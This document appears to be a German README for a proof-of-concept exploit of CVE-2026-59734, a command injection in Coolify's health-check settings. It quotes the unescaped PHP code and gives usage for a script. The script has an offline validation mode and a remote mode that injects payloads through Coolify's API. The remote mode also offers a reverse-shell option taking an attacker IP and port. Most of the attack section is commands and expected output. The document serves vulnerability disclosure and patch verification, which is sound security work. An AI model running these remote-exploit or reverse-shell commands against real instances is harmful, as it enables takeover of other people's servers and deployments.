
OS-Befehlseinschleusung im Health Check → Remote Code Execution
Proof-of-Concept-Exploit für OS Command Injection in der Health-Check-Konfiguration von Coolify.
Jeder authentifizierte Benutzer konnte beliebige Befehle in bereitgestellten Containern ausführen.
Coolify ist eine beliebte Open-Source-, selbstgehostete Deployment-Plattform (30K+ GitHub-Sterne) – eine kostenlose Alternative zu Heroku, Vercel und Netlify.
Eine kritische OS Command Injection-Sicherheitslücke wurde in der Health-Check-Konfiguration von Coolify entdeckt. Die Parameter health_check_host, health_check_method und health_check_path werden direkt in Shell-Befehle interpoliert ohne jegliche Sanitisierung, sodass jeder authentifizierte Benutzer beliebige Befehle in Deployment-Containern ausführen kann.
┌──────────────────┬──────────────────────────────────────┐
│ CVE-ID │ CVE-2026-59734 │
│ Typ │ OS Command Injection (CWE-78) │
│ Schweregrad │ HIGH — CVSS 8.8 │
│ Angriffsvektor │ Netzwerk (Authentifiziert) │
│ Betroffen │ Coolify <= v4.0.0-beta.460 │
│ Behoben in │ Coolify >= v4.0.0-beta.469 │
│ Fix-Commit │ 23f9156c7 │
│ Melder │ CyberTechAjju │
└──────────────────┴──────────────────────────────────────┘
// app/Jobs/ApplicationDeploymentJob.php — generate_healthcheck_commands()
// ⚠️ User input directly in shell command — NO escapeshellarg()!
$generated_healthchecks_commands = [
"curl -s -X {$this->application->health_check_method} -f " .
"{$this->application->health_check_scheme}://" .
"{$this->application->health_check_host}:" .
"{$health_check_port}" .
"{$this->application->health_check_path} > /dev/null || exit 1",
];
Dieses PoC-Skript validiert und exploitiert CVE-2026-59734 mit zwei Modi:
| Modus | Beschreibung | Risiko |
|---|---|---|
--local | Simuliert das anfällige Code-Muster offline. Keine Netzwerkanfragen. Testet alle 3 injizierbaren Parameter + überprüft den Fix. | ✅ Sicher |
--remote | Exploitiert eine echte Coolify-Instanz über die API. Injiziert Payload in die Health-Check-Konfiguration und löst ein Deployment aus. | ⚠️ Authentifizierung erforderlich |
host, method, path + bestätigt, dass der Fix mit escapeshellarg() funktioniert--lhost / --lportgit clone https://github.com/cybertechajju/CVE-2026-59734.git
cd CVE-2026-59734
chmod +x coolify_healthcheck_rce_poc.sh
# Run safe local validation
./coolify_healthcheck_rce_poc.sh --local
Erwartete Ausgabe:
═══ LOKALE VERWUNDBARKEITSMUSTER-VALIDIERUNG ═══
┌─ Test 1: health_check_host-Injection
│ ✅ VERWUNDBAR — Injizierter Befehl erfolgreich ausgeführt
┌─ Test 2: health_check_method-Injection
│ ✅ VERWUNDBAR — Method-Parameter ebenfalls injizierbar
┌─ Test 3: health_check_path-Injection
│ ✅ VERWUNDBAR — Path-Parameter ebenfalls injizierbar
┌─ Test 4: Prüft, ob escapeshellarg() das Problem behebt
│ ✅ SICHER — Bereinigte Eingabe verhindert Injection
# Basic PoC — writes proof file inside the container
./coolify_healthcheck_rce_poc.sh --remote \
--url https://your-coolify-instance:3000 \
--token YOUR_API_TOKEN \
--uuid YOUR_APP_UUID
# Reverse shell
./coolify_healthcheck_rce_poc.sh --remote \
--url https://your-coolify-instance:3000 \
--token YOUR_API_TOKEN \
--uuid YOUR_APP_UUID \
--lhost YOUR_IP \
--lport 4444
# With auto-cleanup (restores original config after exploit)
./coolify_healthcheck_rce_poc.sh --remote \
--url https://your-coolify-instance:3000 \
--token YOUR_API_TOKEN \
--uuid YOUR_APP_UUID \
--cleanup
Verwendung:
Lokale Validierung (sicher, offline):
./coolify_healthcheck_rce_poc.sh --local
Remote-Exploit (erfordert Authentifizierung):
./coolify_healthcheck_rce_poc.sh --remote --url <URL> --token <TOKEN> --uuid <UUID> [OPTIONEN]
Optionen:
--url Coolify-Instanz-URL (z.B. https://coolify.example.com)
--token API-Bearer-Token
--uuid Ziel-Anwendungs-UUID
--payload Benutzerdefinierter Injection-Payload
--lhost Angreifer-IP für Reverse-Shell
--lport Angreifer-Port für Reverse-Shell (Standard: 4444)
--cleanup Original-Konfiguration nach Exploit wiederherstellen
API-Token:
App-UUID:
curl -s https://YOUR-COOLIFY/api/v1/applications \
-H "Authorization: Bearer YOUR_TOKEN" | jq '.[].uuid'
Ich habe einen detaillierten Blogbeitrag geschrieben, der die gesamte Entdeckung, Ausnutzung und die daraus gewonnenen Erkenntnisse erklärt:
🔗 How I Found an OS Command Injection (RCE) in Coolify — Medium
Sehen Sie sich die vollständige Exploit-Demo auf YouTube an:
🔗 CVE-2026-59734 — Coolify RCE Demo — YouTube